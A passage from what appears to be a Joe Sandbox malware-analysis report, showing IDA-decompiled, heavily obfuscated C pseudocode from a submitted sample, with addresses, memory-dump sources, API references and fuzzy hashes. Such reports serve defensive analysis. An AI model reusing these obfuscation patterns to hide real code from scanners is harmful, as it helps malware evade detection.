                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _t134;
                                                                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                                                                            				intOrPtr _t144;
                                                                                                                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                                                                                                                            				intOrPtr _t161;
                                                                                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = _a20 ^ 0x0000005e;
                                                                                                                                                                                                                                                                            				_v24 = _a8 - 0x2565;
                                                                                                                                                                                                                                                                            				_v12 = _a20 ^ 0x0000253b;
                                                                                                                                                                                                                                                                            				_v16 = _a4 + 0x92;
                                                                                                                                                                                                                                                                            				_v32 = _a12 ^ 0x00002801;
                                                                                                                                                                                                                                                                            				_v28 = _a8 + 0x29c;
                                                                                                                                                                                                                                                                            				if(_v12 < (_v16 ^ 0x000003ba)) {
                                                                                                                                                                                                                                                                            					if(_v28 <= (_v32 ^ 0x000027b9)) {
                                                                                                                                                                                                                                                                            						if( *_a16 == ( *(_a16 + 0xd0) ^ 0x000026e5)) {
                                                                                                                                                                                                                                                                            							_v20 = _v8;
                                                                                                                                                                                                                                                                            							while(_v20 ==  *_a16 + 0x27b9) {
                                                                                                                                                                                                                                                                            								_v60 = _v8 ^ 0x000024c7 ^ _v28;
                                                                                                                                                                                                                                                                            								__imp__GetCurrentActCtx(_v60);
                                                                                                                                                                                                                                                                            								 *(_a16 + 0x10) = (_v24 - 0x2633) *  *(_a16 + 0x10);
                                                                                                                                                                                                                                                                            								_v20 = _v20 + 4;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t134 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t19 = _t134 + 0xf8; // 0x1
                                                                                                                                                                                                                                                                            						_t161 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t161 + 0xf8) =  *((intOrPtr*)(_a16 + 0x5c)) + 0x0000074b ^  *_t19;
                                                                                                                                                                                                                                                                            						_t135 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t135 + 0xbadca9)) >= 0x16bcd) {
                                                                                                                                                                                                                                                                            							 *(_a16 + 0x64) =  *0x00FBB051 -  *0x00FBAF59 ^  *(_a16 + 0x64);
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t176 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t27 = _t176 + 0xf8; // 0x1
                                                                                                                                                                                                                                                                            							_t177 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t177 + 0xf8)) =  *((intOrPtr*)(_a16 + 0x30)) -  *((intOrPtr*)(_a16 + 0xe0)) +  *_t27 + 0x37;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v56 = _v8 + 0xce;
                                                                                                                                                                                                                                                                            						_v52 = _v8 + 0x254;
                                                                                                                                                                                                                                                                            						_v48 = _v12 ^ 0x0000253b;
                                                                                                                                                                                                                                                                            						_v44 = _v24 + 0x253b;
                                                                                                                                                                                                                                                                            						_v40 = _v24 + 0x253b;
                                                                                                                                                                                                                                                                            						_v36 = _a16;
                                                                                                                                                                                                                                                                            						_v12 = E00373D70(_v56, _v52, _v48, _v44, _v40, _v36);
                                                                                                                                                                                                                                                                            						_v16 = _v16 + 0x269;
                                                                                                                                                                                                                                                                            						_t144 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t145 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						 *(_t145 + 0xbadca9) =  *(_t144 + 0xbadca9) | 0x000f89a9;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v28 - 0x1d9;
                                                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                                                            0x003883ac
                                                                                                                                                                                                                                                                            0x003883b8
                                                                                                                                                                                                                                                                            0x003883c4
                                                                                                                                                                                                                                                                            0x003883cf
                                                                                                                                                                                                                                                                            0x003883db
                                                                                                                                                                                                                                                                            0x003883e7
                                                                                                                                                                                                                                                                            0x003883f5
                                                                                                                                                                                                                                                                            0x00388407
                                                                                                                                                                                                                                                                            0x0038854f
                                                                                                                                                                                                                                                                            0x00388554
                                                                                                                                                                                                                                                                            0x00388562
                                                                                                                                                                                                                                                                            0x0038857d
                                                                                                                                                                                                                                                                            0x00388584
                                                                                                                                                                                                                                                                            0x003885ae
                                                                                                                                                                                                                                                                            0x0038855f
                                                                                                                                                                                                                                                                            0x0038855f
                                                                                                                                                                                                                                                                            0x00388562
                                                                                                                                                                                                                                                                            0x0038840d
                                                                                                                                                                                                                                                                            0x00388418
                                                                                                                                                                                                                                                                            0x0038841e
                                                                                                                                                                                                                                                                            0x00388424
                                                                                                                                                                                                                                                                            0x0038842a
                                                                                                                                                                                                                                                                            0x00388437
                                                                                                                                                                                                                                                                            0x00388448
                                                                                                                                                                                                                                                                            0x0038849a
                                                                                                                                                                                                                                                                            0x0038844a
                                                                                                                                                                                                                                                                            0x00388459
                                                                                                                                                                                                                                                                            0x0038845f
                                                                                                                                                                                                                                                                            0x00388469
                                                                                                                                                                                                                                                                            0x0038846f
                                                                                                                                                                                                                                                                            0x0038846f
                                                                                                                                                                                                                                                                            0x003884a6
                                                                                                                                                                                                                                                                            0x003884b1
                                                                                                                                                                                                                                                                            0x003884bd
                                                                                                                                                                                                                                                                            0x003884c9
                                                                                                                                                                                                                                                                            0x003884d4
                                                                                                                                                                                                                                                                            0x003884da
                                                                                                                                                                                                                                                                            0x003884fd
                                                                                                                                                                                                                                                                            0x00388509
                                                                                                                                                                                                                                                                            0x00388513
                                                                                                                                                                                                                                                                            0x0038852d
                                                                                                                                                                                                                                                                            0x00388533
                                                                                                                                                                                                                                                                            0x00388533
                                                                                                                                                                                                                                                                            0x00388407
                                                                                                                                                                                                                                                                            0x003885bf

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentActCtx.KERNEL32(?,?,?,?,?,?,?,?,0037110C,?,?,?,?,?,?), ref: 00388584
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Current
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 323882391-0
                                                                                                                                                                                                                                                                            • Opcode ID: 30cd79b592bf294e640e913a028f002d75b0298980ae6a3eccd47cf0268ba08d
                                                                                                                                                                                                                                                                            • Instruction ID: f07e9eee5830e667787dd3fe201999bc9d63dbcd4a007eae130e5ebf5bf73202
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30cd79b592bf294e640e913a028f002d75b0298980ae6a3eccd47cf0268ba08d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94611E71A0010ACFDB14CF98D594AAEB7B1FF88304F508279D919AB785D734E941CF94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E0037C937() {
                                                                                                                                                                                                                                                                            				signed int _t3;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t3 = GetProcessHeap();
                                                                                                                                                                                                                                                                            				 *0x40df80 = _t3;
                                                                                                                                                                                                                                                                            				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                                                            0x0037c937
                                                                                                                                                                                                                                                                            0x0037c93f
                                                                                                                                                                                                                                                                            0x0037c947

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5bd0f3f3a767504a5c78f2ecf7d325cdd2efe1a3a94145e1ff73e1d677806100
                                                                                                                                                                                                                                                                            • Instruction ID: 42a105ab0513c7c07d6cb44f42601eec391125bf88527291f2340710021353ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd0f3f3a767504a5c78f2ecf7d325cdd2efe1a3a94145e1ff73e1d677806100
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AA001B0A01602CBA7418F76AE0920D3AA9BA45691B4581BAA906D6264EB388458AB17
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                                                            			E00386820() {
                                                                                                                                                                                                                                                                            				signed int _t524;
                                                                                                                                                                                                                                                                            				signed int _t528;
                                                                                                                                                                                                                                                                            				intOrPtr _t530;
                                                                                                                                                                                                                                                                            				intOrPtr _t570;
                                                                                                                                                                                                                                                                            				signed int _t584;
                                                                                                                                                                                                                                                                            				intOrPtr _t600;
                                                                                                                                                                                                                                                                            				signed int _t603;
                                                                                                                                                                                                                                                                            				intOrPtr _t607;
                                                                                                                                                                                                                                                                            				intOrPtr _t612;
                                                                                                                                                                                                                                                                            				signed int _t618;
                                                                                                                                                                                                                                                                            				intOrPtr _t624;
                                                                                                                                                                                                                                                                            				intOrPtr _t629;
                                                                                                                                                                                                                                                                            				short _t653;
                                                                                                                                                                                                                                                                            				signed int _t659;
                                                                                                                                                                                                                                                                            				signed int _t660;
                                                                                                                                                                                                                                                                            				intOrPtr _t663;
                                                                                                                                                                                                                                                                            				signed short _t673;
                                                                                                                                                                                                                                                                            				intOrPtr _t716;
                                                                                                                                                                                                                                                                            				signed int _t739;
                                                                                                                                                                                                                                                                            				signed int _t740;
                                                                                                                                                                                                                                                                            				intOrPtr _t747;
                                                                                                                                                                                                                                                                            				signed int _t758;
                                                                                                                                                                                                                                                                            				intOrPtr _t781;
                                                                                                                                                                                                                                                                            				intOrPtr _t801;
                                                                                                                                                                                                                                                                            				intOrPtr _t804;
                                                                                                                                                                                                                                                                            				signed int _t824;
                                                                                                                                                                                                                                                                            				signed int _t828;
                                                                                                                                                                                                                                                                            				intOrPtr _t848;
                                                                                                                                                                                                                                                                            				signed int _t862;
                                                                                                                                                                                                                                                                            				signed int _t936;
                                                                                                                                                                                                                                                                            				intOrPtr _t952;
                                                                                                                                                                                                                                                                            				intOrPtr _t953;
                                                                                                                                                                                                                                                                            				intOrPtr _t955;
                                                                                                                                                                                                                                                                            				intOrPtr* _t958;
                                                                                                                                                                                                                                                                            				void* _t960;
                                                                                                                                                                                                                                                                            				void* _t961;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t958 = _t960 - 0x60;
                                                                                                                                                                                                                                                                            				_t961 = _t960 - 0xf4;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 8)) = 0xfcf -  *0x40dd00;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *0x40dcb6 & 0x000000ff) * 4));
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 + 8)) = 0x207b;
                                                                                                                                                                                                                                                                            				_t659 =  *0x40dcd8; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + _t659 * 4));
                                                                                                                                                                                                                                                                            				_t660 =  *0x40dce4; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t958 + 4) =  *( *((intOrPtr*)(_t958 + 0x78)) + _t660 * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x38) =  *0x40dcfc & 0x0000ffff &  *0x40dce4;
                                                                                                                                                                                                                                                                            				_t663 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 0x90)) =  *((intOrPtr*)(_t663 + 0xa0 +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                            				 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) + 1;
                                                                                                                                                                                                                                                                            				_t801 =  *0x40dcac; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x44) =  *(_t801 +  *( *(_t958 + 0x70)) * 4) |  *0x40dca8;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x54) = ( *0x40dcb4 & 0x000000ff) *  *( *((intOrPtr*)(_t958 + 0x7c)) + 0x1648);
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 + 0x40)) = 0x677;
                                                                                                                                                                                                                                                                            				_t804 =  *0x40dcdc; // 0x0
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x10) =  *(_t804 + 0x4e24) / 0xbef;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x3c) = ( *( *((intOrPtr*)(_t958 + 0x78)) + 0x30 + ( *( *(_t958 + 0x70)) << 2) * 2) & 0x0000ffff) + 0x136d;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x4c) = ( *(_t958 + 0x70))[0x1cad] ^ 0x00000550;
                                                                                                                                                                                                                                                                            				_t673 =  *0x40dcc0; // 0x0
                                                                                                                                                                                                                                                                            				 *0x40dcc0 = _t673 - 1;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x5b) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + ( *0x40dcc0 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                                            				 *(_t958 - 0x94) = ( *(_t958 + 0x70))[0xdab];
                                                                                                                                                                                                                                                                            				 *_t958 = 0x8b2;
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x48) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x74 +  *( *(_t958 + 0x70)) * 4) % 0x1a70;
                                                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t958 - 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 0x19d0));
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x5c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0x1c +  *(_t958 + 0x48) * 4);
                                                                                                                                                                                                                                                                            				while( *(_t958 + 0x5c) <  *((intOrPtr*)( *(_t958 + 0x38) + ( *( *(_t958 + 0x3c)) & 0x000000ff) * 4))) {
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					 *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4) = 0xf32 %  *( *((intOrPtr*)(_t958 + 0x40)) +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x10) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					 *(_t958 - 0xc) =  *( *(_t958 + 0x44) + 0x40 +  *0x40dcb0 * 3 * 2) & 0x0000ffff ^  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                                            					 *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4) = E00387EF0( *(_t958 - 0x10),  *(_t958 - 0xc));
                                                                                                                                                                                                                                                                            					_t739 =  *0x40dcb8; // 0x0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) + _t739 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) +  *( *(_t958 + 0x70)) * 4));
                                                                                                                                                                                                                                                                            					_t740 =  *0x40dcb8; // 0x0
                                                                                                                                                                                                                                                                            					 *0x40dcb8 = _t740 + 1;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x28) =  *(_t958 + 0x5b) & 0x000000ff;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x5b) =  *(_t958 + 0x5b) + 1;
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x2c) =  *(_t958 + 0x5c) *  *( *((intOrPtr*)(_t958 + 0x7c)) + (( *( *(_t958 + 0x54)) & 0x000000ff) << 2) * 4);
                                                                                                                                                                                                                                                                            					_t600 =  *0x40dcf0; // 0x0
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x28) =  *(_t600 + 0x1c +  *(_t958 + 0x5c) * 4) | 0x000017a7;
                                                                                                                                                                                                                                                                            					_t747 =  *0x40dcbc; // 0x0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t958 - 0x24)) =  *((intOrPtr*)(_t747 + 0x28cc));
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x20) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					_t603 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x1c) = _t603 |  *( *(_t958 + 0x38) + ( *(_t958 + 0x48) << 2) * 4);
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x18) =  *( *((intOrPtr*)(_t958 + 0x78)) +  *(_t958 + 0x5c) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x2c) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x34)) + 0x1624));
                                                                                                                                                                                                                                                                            					_t607 =  *0x40dcd4; // 0x0
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x30) =  *(_t607 + ( *0x40dcc4 & 0x0000ffff) * 4) ^ 0x00000668;
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x14) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					_t612 = E00385190( *(_t958 + 0x28) & 0x0000ffff,  *(_t958 - 0x2c),  *(_t958 - 0x28),  *((intOrPtr*)(_t958 - 0x24)),  *(_t958 - 0x20),  *(_t958 - 0x1c),  *(_t958 - 0x18),  *(_t958 + 0x2c) & 0x0000ffff,  *(_t958 + 0x30) & 0x0000ffff,  *(_t958 - 0x14));
                                                                                                                                                                                                                                                                            					_t758 =  *0x40dd00; // 0x0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x40)) + _t758 * 4)) = _t612;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t958 - 0x34)) = 0xe55;
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x30) =  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					( *(_t958 + 0x3c))[( *( *(_t958 + 0x3c)) & 0x000000ff) + 0x1e] = E00387EF0( *((intOrPtr*)(_t958 - 0x34)),  *(_t958 - 0x30));
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t958 - 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *( *(_t958 + 0x70)) * 3 * 4));
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x40) =  *(_t958 + 0x68) *  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x68) =  *(_t958 + 0x68) + 1;
                                                                                                                                                                                                                                                                            					_t618 =  *0x40dcb0; // 0x0
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x3c) = _t618 %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x38) = ( *(_t958 + 0x70))[ *( *(_t958 + 0x54)) & 0x000000ff];
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x54) =  *(_t958 + 0x54) - 1;
                                                                                                                                                                                                                                                                            					_push( *(_t958 - 0x38));
                                                                                                                                                                                                                                                                            					_push( *(_t958 - 0x3c));
                                                                                                                                                                                                                                                                            					_push( *(_t958 - 0x40));
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)(_t958 - 0x44)));
                                                                                                                                                                                                                                                                            					_t624 = E003744B0();
                                                                                                                                                                                                                                                                            					_t961 = _t961 + 0x48;
                                                                                                                                                                                                                                                                            					 *0x40dd08 = _t624;
                                                                                                                                                                                                                                                                            					 *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) = ( *( *_t958 +  *( *(_t958 + 0x70)) + 0x14) & 0x000000ff) - ( *( *(_t958 + 0x10) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_t629 =  *0x40dd04; // 0x0
                                                                                                                                                                                                                                                                            					if(_t629 >=  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x6c)) +  *(_t958 + 0x5c) * 4)) ||  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + 0x2c +  *(_t958 + 0x5c) * 4)) >= ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x74)) + 8 +  *( *(_t958 + 0x70)) * 3 * 4)) >  *(_t958 + 0x5c)) {
                                                                                                                                                                                                                                                                            							 *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) = ( *0x40dcb5 & 0x000000ff &  *(_t958 + 0x48)) + ( *( *(_t958 + 0x44) +  *(_t958 + 0x5c) * 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                            							 *( *((intOrPtr*)(_t958 + 0x40)) + 0x5c + ( *(_t958 + 0x5c) << 2) * 4) =  *( *((intOrPtr*)(_t958 - 8)) +  *0x40dcd8) & 0x000000ff;
                                                                                                                                                                                                                                                                            							 *0x40dcb4 =  *( *(_t958 + 0x4c) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t958 - 0x58)) =  *(_t958 + 0x5c) -  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            							 *(_t958 - 0x54) =  *( *(_t958 + 4) + 2 +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff &  *( *(_t958 + 0x4c) + 0x3c +  *(_t958 + 0x5c) * 4);
                                                                                                                                                                                                                                                                            							 *(_t958 + 0x70) =  *(_t958 + 0x70) - 4;
                                                                                                                                                                                                                                                                            							_t781 = M0040DCC8; // 0x0
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t958 - 0x50)) = _t781;
                                                                                                                                                                                                                                                                            							 *(_t958 - 0x4c) =  *( *((intOrPtr*)(_t958 + 0x6c)) + 0xc +  *( *(_t958 + 0x70)) * 4) %  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            							_t936 =  *0x40dce8; // 0x0
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t958 - 0x48)) = _t936 +  *(_t958 + 0x5c);
                                                                                                                                                                                                                                                                            							 *(_t958 + 0x24) =  *((intOrPtr*)( *((intOrPtr*)(_t958 + 8)) +  *(_t958 + 0x5c) * 4));
                                                                                                                                                                                                                                                                            							 *( *(_t958 + 0x70)) =  *( *(_t958 + 0x70)) - 1;
                                                                                                                                                                                                                                                                            							_t653 = E003870A0( *((intOrPtr*)(_t958 - 0x58)),  *(_t958 - 0x54),  *((intOrPtr*)(_t958 - 0x50)),  *(_t958 - 0x4c),  *((intOrPtr*)(_t958 - 0x48)),  *(_t958 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                            							_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                                            							 *((short*)( *((intOrPtr*)(_t958 + 0x34)) +  *( *(_t958 + 0x70)) * 2)) = _t653;
                                                                                                                                                                                                                                                                            							 *0x40dca8 = ( *( *(_t958 + 0x44) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 2) & 0x0000ffff) *  *(_t958 + 0x5c) | ( *(_t958 + 0x70))[0xe97] |  *0x40dca8;
                                                                                                                                                                                                                                                                            							 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x5c) =  *(_t958 + 0x5c) + 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				 *(_t958 + 0x50) =  *( *((intOrPtr*)(_t958 + 0xc)) +  *0x40dcd8) & 0x000000ff;
                                                                                                                                                                                                                                                                            				while( *(_t958 + 0x50) != ( *(_t958 + 0x5b) & 0x000000ff)) {
                                                                                                                                                                                                                                                                            					_t952 =  *0x40dcec; // 0x0
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                                                                            					 *( *(_t958 + 0x54) +  *(_t958 + 0x50)) = (0x0000166f /  *(_t952 + 0x10 + ( *0x40dcc0 & 0x0000ffff) * 4) ^  *(_t958 + 0x50)) / ( *( *((intOrPtr*)(_t958 + 0xc)) +  *(_t958 + 0x50)) & 0x000000ff) ^  *( *(_t958 + 0x54) +  *(_t958 + 0x50)) & 0x000000ff;
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x6c) =  *( *(_t958 + 4) +  *( *(_t958 + 0x70)) * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t958 - 0x68)) = 0xedb;
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x64) =  *(_t958 + 0x50);
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t958 - 0x60)) = ( *( *(_t958 + 0x10) + 0x1072) & 0x0000ffff) +  *((intOrPtr*)( *((intOrPtr*)(_t958 + 0x7c)) + ( *(_t958 + 0x50) << 2) * 4));
                                                                                                                                                                                                                                                                            					 *(_t958 - 0x5c) =  *( *((intOrPtr*)(_t958 + 0x74)) + 0x58 +  *(_t958 + 0x50) * 4) |  *0x40dcb0;
                                                                                                                                                                                                                                                                            					_t862 =  *0x40dce0; // 0x0
                                                                                                                                                                                                                                                                            					 *0x40dce0 = _t862 + 1;
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x20) = ( *( *((intOrPtr*)(_t958 + 0x34)) + 0x15d4) & 0x0000ffff) *  *0x40dce0;
                                                                                                                                                                                                                                                                            					_t570 = E003870A0( *(_t958 - 0x6c),  *((intOrPtr*)(_t958 - 0x68)),  *(_t958 - 0x64),  *((intOrPtr*)(_t958 - 0x60)),  *(_t958 - 0x5c),  *(_t958 + 0x20) & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_t961 = _t961 + 0x18;
                                                                                                                                                                                                                                                                            					 *0x40dd08 = _t570;
                                                                                                                                                                                                                                                                            					_t953 =  *0x40dcd4; // 0x0
                                                                                                                                                                                                                                                                            					_t716 =  *0x40dcd4; // 0x0
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t716 +  *0x40dd00 * 3 * 4)) =  *( *((intOrPtr*)(_t958 + 0x7c)) + ( *( *(_t958 + 0x54)) & 0x000000ff) * 4) -  *((intOrPtr*)(_t953 +  *0x40dd00 * 3 * 4));
                                                                                                                                                                                                                                                                            					 *(_t958 + 0x54) =  *(_t958 + 0x54) + 1;
                                                                                                                                                                                                                                                                            					( *(_t958 + 0x70))[ *(_t958 + 0x48)] = ( *0x40dcfc & 0x0000ffff) *  *( *((intOrPtr*)(_t958 + 0x74)) +  *(_t958 + 0x50) * 4) - ( *( *_t958 +  *(_t958 + 0x48) + 0x27) & 0x000000ff) |  *( *((intOrPtr*)(_t958 - 4)) +  *( *(_t958 + 0x70)) * 4);
